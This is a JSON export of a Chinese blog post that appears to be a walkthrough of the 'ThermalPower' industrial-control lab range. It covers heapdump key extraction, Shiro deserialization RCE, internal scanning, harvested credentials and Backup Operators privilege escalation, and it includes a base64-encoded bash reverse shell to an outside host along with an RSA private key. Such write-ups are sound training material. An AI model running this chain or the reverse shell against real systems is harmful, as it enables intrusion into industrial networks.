{"id":3212,"date":"2024-03-01T18:22:43","date_gmt":"2024-03-01T10:22:43","guid":{"rendered":"https:\/\/fushuling.com\/?p=3212"},"modified":"2024-03-01T18:26:52","modified_gmt":"2024-03-01T10:26:52","slug":"%e6%98%a5%e7%a7%8b%e4%ba%91%e5%a2%83-thermalpower","status":"publish","type":"post","link":"https:\/\/fushuling.com\/index.php\/2024\/03\/01\/%e6%98%a5%e7%a7%8b%e4%ba%91%e5%a2%83-thermalpower\/","title":{"rendered":"\u6625\u79cb\u4e91\u5883-ThermalPower"},"content":{"rendered":"\n<p>\u8003\u70b9\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u5185\u5b58\u6cc4\u9732<\/li>\n\n\n\n<li>shiro\u53cd\u5e8f\u5217\u5316RCE<\/li>\n\n\n\n<li>\u5de5\u63a7\u5165\u95e8<\/li>\n\n\n\n<li>rsa+aes\u89e3\u5bc6<\/li>\n\n\n\n<li>Backup Operators\u63d0\u6743<\/li>\n<\/ul>\n\n\n\n<p>\u548chospital\u4e00\u6837\uff0c\u627e\u5185\u5b58\u6cc4\u9732<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>http:&#47;&#47;121.89.193.140:8080\/actuator\/heapdump <\/code><\/pre>\n\n\n\n<p>\u8fd9\u91cc\u7528hospital\u91cc\u63d0\u8fc7\u7684\u5185\u5b58\u6cc4\u9732\u68c0\u6d4b\u5de5\u5177JDumpSpider(https:\/\/github.com\/whwlsfb\/JDumpSpider)\u53ef\u4ee5\u76f4\u63a5\u627e\u5230key\uff0c\u7136\u540e\u5de5\u5177\u4e00\u628a\u68ad\u5373\u53ef<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>java -jar JDumpSpider-1.1-SNAPSHOT-full.jar heapdump<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>...\nCookieRememberMeManager(ShiroKey)\n-------------\nalgMode = CBC, key = QZYysgMYhG6\/CzIJlVpR2g==, algName = AES\n...<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F03%2F01-01.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F03%2F01-01.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p>\u7528\u5de5\u5177\u5f39\u4e00\u4e0bshell<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjEuMzYueHgueHgvOTM4MyAwPiYx}|{base64,-d}|{bash,-i}'<\/code><\/pre>\n\n\n\n<p>\u626b\u5185\u7f51<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>(remote) root@security:\/# .\/fscan -h 172.22.17.213\/24\r\n\r\n   ___                              _    \r\n  \/ _ \\     ___  ___ _ __ __ _  ___| | __ \r\n \/ \/_\\\/____\/ __|\/ __| '__\/ _` |\/ __| |\/ \/\r\n\/ \/_\\\\_____\\__ \\ (__| | | (_| | (__|   &lt;    \r\n\\____\/     |___\/\\___|_|  \\__,_|\\___|_|\\_\\   \r\n                     fscan version: 1.8.2\r\nstart infoscan\r\n(icmp) Target 172.22.17.6     is alive\r\n(icmp) Target 172.22.17.213   is alive\r\n&#91;*] Icmp alive hosts len is: 2\r\n172.22.17.213:8080 open\r\n172.22.17.6:445 open\r\n172.22.17.6:139 open\r\n172.22.17.6:135 open\r\n172.22.17.6:80 open\r\n172.22.17.213:22 open\r\n172.22.17.6:21 open\r\n&#91;*] alive ports len is: 7\r\nstart vulscan\r\n&#91;*] NetInfo:\r\n&#91;*]172.22.17.6\r\n   &#91;->]WIN-ENGINEER\r\n   &#91;->]172.22.17.6\r\n&#91;*] NetBios: 172.22.17.6     WORKGROUP\\WIN-ENGINEER         \r\n&#91;*] WebTitle: http:\/\/172.22.17.213:8080 code:302 len:0      title:None \u8df3\u8f6curl: http:\/\/172.22.17.213:8080\/login;jsessionid=648FF75E8E0080D29B27F5880686BCC6\r\n&#91;*] WebTitle: http:\/\/172.22.17.213:8080\/login;jsessionid=648FF75E8E0080D29B27F5880686BCC6 code:200 len:2936   title:\u706b\u521b\u80fd\u6e90\u76d1\u63a7\u753b\u9762\u7ba1\u7406\u5e73\u53f0\r\n&#91;+] ftp:\/\/172.22.17.6:21:anonymous \r\n   &#91;->]Modbus\r\n   &#91;->]PLC\r\n   &#91;->]web.config\r\n   &#91;->]WinCC\r\n   &#91;->]\u5185\u90e8\u8f6f\u4ef6\r\n   &#91;->]\u706b\u521b\u80fd\u6e90\u5185\u90e8\u8d44\u6599\r\n&#91;*] WebTitle: http:\/\/172.22.17.6        code:200 len:661    title:172.22.17.6 - \/\r\n&#91;+] http:\/\/172.22.17.213:8080 poc-yaml-spring-actuator-heapdump-file \r\n&#91;+] http:\/\/172.22.17.213:8080 poc-yaml-springboot-env-unauth spring2\r<\/code><\/pre>\n\n\n\n<p>\u626b\u51fa\u6765\u4e00\u4e2a\u533f\u540dftp\uff0c\u8fde\u4e00\u4e0b<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F03%2F02-02.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F03%2F02-02.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>WIN-SCADA: 172.22.26.xx\r\nUsername: Administrator\r\nPassword: IYnT3GyCiy3<\/code><\/pre>\n\n\n\n<p>\u518d\u626b\u4e00\u4e0b26\u8fd9\u4e2a\u6bb5<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>(remote) root@security:\/# .\/fscan -h 172.22.26.1\/24\r\n\r\n   ___                              _    \r\n  \/ _ \\     ___  ___ _ __ __ _  ___| | __ \r\n \/ \/_\\\/____\/ __|\/ __| '__\/ _` |\/ __| |\/ \/\r\n\/ \/_\\\\_____\\__ \\ (__| | | (_| | (__|   &lt;    \r\n\\____\/     |___\/\\___|_|  \\__,_|\\___|_|\\_\\   \r\n                     fscan version: 1.8.2\r\nstart infoscan\r\n(icmp) Target 172.22.26.11    is alive\r\n&#91;*] Icmp alive hosts len is: 1\r\n172.22.26.11:1433 open\r\n172.22.26.11:445 open\r\n172.22.26.11:139 open\r\n172.22.26.11:135 open\r\n172.22.26.11:80 open\r\n&#91;*] alive ports len is: 5\r\nstart vulscan\r\n&#91;*] NetBios: 172.22.26.11    WORKGROUP\\WIN-SCADA            \r\n&#91;*] NetInfo:\r\n&#91;*]172.22.26.11\r\n   &#91;->]WIN-SCADA\r\n   &#91;->]172.22.26.11\r\n&#91;+] mssql:172.22.26.11:1433:sa 123456\r\n&#91;*] WebTitle: http:\/\/172.22.26.11       code:200 len:703    title:IIS Windows Server\r\n\u5df2\u5b8c\u6210 5\/5\r\n&#91;*] \u626b\u63cf\u7ed3\u675f,\u8017\u65f6: 5.730632575s\r<\/code><\/pre>\n\n\n\n<p>rdp\u8fde172.22.26.11\uff0c\u7136\u540e\u70b9\u4e00\u4e0b\u90a3\u4e2a\u9505\u7089\u5f00\u5c31\u6709flag\u4e86<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F03%2F02-03.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F03%2F02-03.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p>\u6309\u4f4fwindows+d\u56de\u4e3b\u9875\uff0c\u53ef\u4ee5\u770b\u5230\u684c\u9762\u4e0a\u6709\u4e2aScadaDB.sql.locky\uff0c\u6211\u4eec\u76f4\u63a5\u8fde\u6570\u636e\u5e93\u91cc\u90a3\u4e2aflag\u662f\u7a7a\u7684\uff0c\u5f97\u627e\u5907\u4efd\uff0c\u4f46\u8fd9\u4e2a\u5907\u4efd\u88ab\u52a0\u5bc6\u4e86\uff0c\u8fd9\u91cc\u6211\u4eec\u7528\u9898\u76ee\u63cf\u8ff0\u91cc\u7ed9\u7684\u5bc6\u94a5\u89e3\u5bc6\u4e00\u4e0b\u5373\u53ef<\/p>\n\n\n\n<p>\u9898\u76ee\u63cf\u8ff0\u91cc\u7ed9\u4e86\u4e00\u4e2aprivateKey\u548cencryptedAesKey\uff0c\u4f7f\u7528privateKey\u7528rsa\u52a0\u5bc6\u4e86aeskey\u5f97\u5230\u7684encryptedAesKey<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>#privateKey\n&lt;RSAKeyValue>&lt;Modulus>uoL2CAaVtMVp7b4\/Ifcex2Artuu2tvtBO25JdMwAneu6gEPCrQvDyswebchA1LnV3e+OJV5kHxFTp\/diIzSnmnhUmfZjYrshZSLGm1fTwcRrL6YYVsfVZG\/4ULSDURfAihyN1HILP\/WqCquu1oWo0CdxowMsZpMDPodqzHcFCxE=&lt;\/Modulus>&lt;Exponent>AQAB&lt;\/Exponent>&lt;P>2RPqaofcJ\/phIp3QFCEyi0kj0FZRQmmWmiAmg\/C0MyeX255mej8Isg0vws9PNP3RLLj25O1pbIJ+fqwWfUEmFw==&lt;\/P>&lt;Q>2\/QGgIpqpxODaJLQvjS8xnU8NvxMlk110LSUnfAh\/E6wB\/XUc89HhWMqh4sGo\/LAX0n94dcZ4vLMpzbkVfy5Fw==&lt;\/Q>&lt;DP>ulK51o6ejUH\/tfK281A7TgqNTvmH7fUra0dFR+KHCZFmav9e\/na0Q\/\/FivTeC6IAtN5eLMkKwDSR1rBm7UPKKQ==&lt;\/DP>&lt;DQ>PO2J541wIbvsCMmyfR3KtQbAmVKmPHRUkG2VRXLBV0zMwke8hCAE5dQkcct3GW8jDsJGS4r0JsOvIRq5gYAyHQ==&lt;\/DQ>&lt;InverseQ>JS2ttB0WJm223plhJQrWqSvs9LdEeTd8cgNWoyTkMOkYIieRTRko\/RuXufgxppl4bL9RRTI8e8tkHoPzNLK4bA==&lt;\/InverseQ>&lt;D>tuLJ687BJ5RYraZac6zFQo178A8siDrRmTwozV1o0XGf3DwVfefGYmpLAC1X3QAoxUosoVnwZUJxPIfodEsieDoxRqVxMCcKbJK3nwMdAKov6BpxGUloALlxTi6OImT6w\/roTW9OK6vlF54o5U\/4DnQNUM6ss\/2\/CMM\/EgM9vz0=&lt;\/D>&lt;\/RSAKeyValue><\/code><\/pre>\n\n\n\n<p>\u5148\u628aXML\u8f6c\u6210PEM\u683c\u5f0f(https:\/\/www.ssleye.com\/ssltool\/pem_xml.html)<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>-----BEGIN PRIVATE KEY-----\nMIICdwIBADANBgkqhkiG9w0BAQEFAASCAmEwggJdAgEAAoGBALqC9ggGlbTFae2+\nPyH3HsdgK7brtrb7QTtuSXTMAJ3ruoBDwq0Lw8rMHm3IQNS51d3vjiVeZB8RU6f3\nYiM0p5p4VJn2Y2K7IWUixptX08HEay+mGFbH1WRv+FC0g1EXwIocjdRyCz\/1qgqr\nrtaFqNAncaMDLGaTAz6Hasx3BQsRAgMBAAECgYEAtuLJ687BJ5RYraZac6zFQo17\n8A8siDrRmTwozV1o0XGf3DwVfefGYmpLAC1X3QAoxUosoVnwZUJxPIfodEsieDox\nRqVxMCcKbJK3nwMdAKov6BpxGUloALlxTi6OImT6w\/roTW9OK6vlF54o5U\/4DnQN\nUM6ss\/2\/CMM\/EgM9vz0CQQDZE+pqh9wn+mEindAUITKLSSPQVlFCaZaaICaD8LQz\nJ5fbnmZ6PwiyDS\/Cz080\/dEsuPbk7Wlsgn5+rBZ9QSYXAkEA2\/QGgIpqpxODaJLQ\nvjS8xnU8NvxMlk110LSUnfAh\/E6wB\/XUc89HhWMqh4sGo\/LAX0n94dcZ4vLMpzbk\nVfy5FwJBALpSudaOno1B\/7XytvNQO04KjU75h+31K2tHRUfihwmRZmr\/Xv52tEP\/\nxYr03guiALTeXizJCsA0kdawZu1DyikCQDztieeNcCG77AjJsn0dyrUGwJlSpjx0\nVJBtlUVywVdMzMJHvIQgBOXUJHHLdxlvIw7CRkuK9CbDryEauYGAMh0CQCUtrbQd\nFiZttt6ZYSUK1qkr7PS3RHk3fHIDVqMk5DDpGCInkU0ZKP0bl7n4MaaZeGy\/UUUy\nPHvLZB6D8zSyuGw=\n-----END PRIVATE KEY-----<\/code><\/pre>\n\n\n\n<p>\u7136\u540e\u627e\u4e2a\u5728\u7ebf\u7f51\u7ad9\u628aencryptedAesKey\u89e3\u4e00\u4e0b(https:\/\/www.lddgo.net\/encrypt\/rsa)<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F03%2F02-06.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F03%2F02-06.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p>\u6700\u540e\u5199\u4e2aaes\u811a\u672c\u89e3\u4e00\u4e0b\u627e\u4e2asql\u6587\u4ef6\uff0c\u628a\u524d16\u4f4d\u4f5c\u4e3aiv<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from Crypto.Cipher import AES\nfrom Crypto.Util.Padding import unpad\nimport base64\n\n# \u8bfb\u53d6\u52a0\u5bc6\u6587\u4ef6\u5185\u5bb9\nencrypted_file = 'ScadaDB.sql.locky'\nwith open(encrypted_file, 'rb') as file:\n    encrypted_data = file.read()\n\n# \u89e3\u5bc6\u5bc6\u94a5\nkey = 'cli9gqXpTrm7CPMcdP9TSmVSzXVgSb3jrW+AakS7azk='\nkey = base64.b64decode(key)\n\n# \u6309\u7167\u6bcf 16 \u4f4d\u6570\u636e\u4f5c\u4e3a IV \u8fdb\u884c\u89e3\u5bc6\niv = encrypted_data&#91;:16]\n\n# \u521b\u5efa AES \u89e3\u5bc6\u5668\ncipher = AES.new(key, AES.MODE_CBC, IV=iv)\n\n# \u89e3\u5bc6\u6570\u636e\uff08\u53bb\u9664 IV \u540e\u7684\u90e8\u5206\uff09\ndecrypted_data = unpad(cipher.decrypt(encrypted_data&#91;16:]), AES.block_size)\n\n# \u5199\u5165\u89e3\u5bc6\u540e\u7684\u5185\u5bb9\u5230\u65b0\u6587\u4ef6\ndecrypted_file = 'decrypted_file.txt'\nwith open(decrypted_file, 'wb') as file:\n    file.write(decrypted_data)\n\nprint(f'\u6587\u4ef6\u89e3\u5bc6\u5b8c\u6210\uff0c\u89e3\u5bc6\u540e\u7684\u6570\u636e\u5df2\u4fdd\u5b58\u5230 {decrypted_file}')<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F03%2F02-05.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F03%2F02-05.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p>\u8fd8\u6709\u4e00\u4e2aflag\u5728SCADA\u5de5\u7a0b\u5e08\u7684\u4e2a\u4ebaPC\u4e0a\uff0c\u8981\u63d0\u6743\u3002\u8fd8\u662f\u90a3\u4e2aftp\uff0c\u53ef\u4ee5\u7ffb\u5230\u5f88\u591a\u7528\u6237\u8d44\u6599\u4ee5\u53ca\u4ed6\u4eec\u7684\u5bc6\u7801\u89c4\u8303\u521d\u59cb\u5bc6\u7801\u4e3a\u8d26\u6237\u540d+@+\u5de5\u53f7\uff0c\u6bd4\u5982\u5de5\u7a0b\u5e08chenhua\uff0c\u6211\u4eec\u53ef\u4ee5\u62fc\u51fa\u6765\u5bc6\u7801\u4e3achenhua@0813\uff0c\u8fd9\u4e2a\u53ef\u4ee5\u76f4\u63a5rdp\u4e0a172.22.17.6\uff0c\u56e0\u4e3a\u7528\u6237\u5728Backup Operators\u7ec4\u5185\uff0c\u6240\u4ee5\u53ef\u4ee5\u4f7f\u7528Backup Operators\u7ec4\u5185\u6743\u9650\u63d0\u6743(<a href=\"https:\/\/github.com\/k4sth4\/SeBackupPrivilege\">https:\/\/github.com\/k4sth4\/SeBackupPrivilege<\/a>)<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>PS C:\\Windows\\system32> cd C:\\Users\\chenhua\\Desktop\\\nPS C:\\Users\\chenhua\\Desktop> Import-Module .\\SeBackupPrivilegeUtils.dll\nPS C:\\Users\\chenhua\\Desktop> Import-Module .\\SeBackupPrivilegeCmdLets.dll\nPS C:\\Users\\chenhua\\Desktop> Set-SeBackupPrivilege\nPS C:\\Users\\chenhua\\Desktop> Get-SeBackupPrivilege\nSeBackupPrivilege is enabled\nPS C:\\Users\\chenhua\\Desktop> Copy-FileSeBackupPrivilege\u00a0C:\\Users\\Administrator\\flag\\flag02.txt\u00a0C:\\Users\\chenhua\\Desktop\\flag02.txt\u00a0-Overwrite\nCopied 350 bytes\nPS C:\\Users\\chenhua\\Desktop> type .\\flag02.txt\n  _____.__                 _______   ________\n_\/ ____\\  | _____     ____ \\   _  \\  \\_____  \\\n\\   __\\|  | \\__  \\   \/ ___\\\/  \/_\\  \\  \/  ____\/\n |  |  |  |__\/ __ \\_\/ \/_\/  >  \\_\/   \\\/       \\\n |__|  |____(____  \/\\___  \/ \\_____  \/\\_______ \\\n                 \\\/\/_____\/        \\\/         \\\/\n\n\nflag02: flag{cd4c83d9-0fc9-47f3-a947-c34c5e5266fb}\nPS C:\\Users\\chenhua\\Desktop><\/code><\/pre>\n\n\n\n<p>\u8fd9\u4e2a\u9776\u573a\u662f\u6628\u5e74\u5de5\u4e1a\u4fe1\u606f\u5b89\u5168\u6280\u80fd\u5927\u8d5b\u590d\u8d5b\u706b\u529b\u53d1\u7535\u573a\u666f\u7684\u539f\u9898\uff0c\u5f53\u65f6\u5e2e\u670b\u53cb\u770b\u9898\u6ca1\u6253\u7a7f\uff0c\u8fd9\u6b21\u603b\u7b97\u6709\u673a\u4f1a\u4e86\u3002\u5f53\u65f6\u53ea\u6709\u4e94\u4e2a\u961f\u6253\u7a7f\uff0c\u57fa\u672c\u4e0a\u5168\u662f\u8fd0\u8425\u5546\uff0c\u4ee4\u4eba\u611f\u53f9<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F03%2F02-07.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F03%2F02-07.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n","protected":false},"excerpt":{"rendered":"<p>\u8003\u70b9\uff1a<br \/>\n\u5185\u5b58\u6cc4\u9732<br \/>\nshiro\u53cd\u5e8f\u5217\u5316RCE<br \/>\n\u5de5\u63a7\u5165\u95e8<br \/>\nrsa+aes\u89e3\u5bc6<br \/>\nBackup Operators\u63d0\u6743<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11],"tags":[],"class_list":["post-3212","post","type-post","status-publish","format-standard","hentry","category-11"],"_links":{"self":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/3212","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/comments?post=3212"}],"version-history":[{"count":8,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/3212\/revisions"}],"predecessor-version":[{"id":3220,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/3212\/revisions\/3220"}],"wp:attachment":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/media?parent=3212"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/categories?post=3212"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/tags?post=3212"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}